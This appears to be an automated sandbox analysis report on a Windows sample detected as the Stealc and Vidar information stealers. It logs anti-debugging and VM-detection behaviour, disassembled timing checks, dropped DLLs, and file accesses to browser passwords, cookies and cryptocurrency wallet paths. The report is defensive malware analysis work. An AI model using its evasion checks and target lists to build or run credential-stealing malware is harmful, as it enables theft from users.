Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7BFCA second address: D7BFDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007FC4E87CE376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7BFDA second address: D7C009 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC4E9056F56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edx 0x00000010 jnl 00007FC4E9056F56h 0x00000016 jmp 00007FC4E9056F5Ah 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jnp 00007FC4E9056F56h 0x00000024 jnl 00007FC4E9056F56h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C009 second address: D7C00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7F3B0 second address: D7F3B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7F3B4 second address: D7F3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0292 second address: 53C02FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC4E9056F5Fh 0x00000009 sub si, 95AEh 0x0000000e jmp 00007FC4E9056F69h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FC4E9056F5Fh 0x0000001f sub cl, FFFFFFBEh 0x00000022 jmp 00007FC4E9056F69h 0x00000027 popfd 0x00000028 popad 0x00000029 mov dword ptr [esp], ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C02FF second address: 53C0336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC4E87CE389h 0x0000000a sbb eax, 4438E8A6h 0x00000010 jmp 00007FC4E87CE381h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0336 second address: 53C033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C033C second address: 53C0340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0340 second address: 53C035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC4E9056F60h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C035F second address: 53C0364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0364 second address: 53C036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0440 second address: 53C045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C045D second address: 53C0481 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d call 00007FC4E9056F5Ah 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0B67 second address: 53C0B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AF18BE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AF1969 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AEF096 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CBE87D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: C93292 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AF18CE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D20543 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_008A4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0089DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0089E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_008A3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0089F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_008916D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0089BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_008A38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0089ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_008A4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0089DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00891160 GetSystemInfo,ExitProcess,

0_2_00891160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp)
Source: file.exe, 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareaj
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001451000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13751
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13748
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-14938
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13763
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13767
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13802

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008945C0 VirtualProtect ?,00000004,00000100,00000000

0_2_008945C0

Source: C:\Users\user\Desktop\file.exe

0_2_008A9860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A9750 mov eax, dword ptr fs:[00000030h]

0_2_008A9750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_008A78E0

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_008A9600

Source: file.exe, 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: U+Program Manager
Source: file.exe	Binary or memory string: U+Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_008A7B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_008A7980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_008A7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_008A7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1669710829.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json#
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.%

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
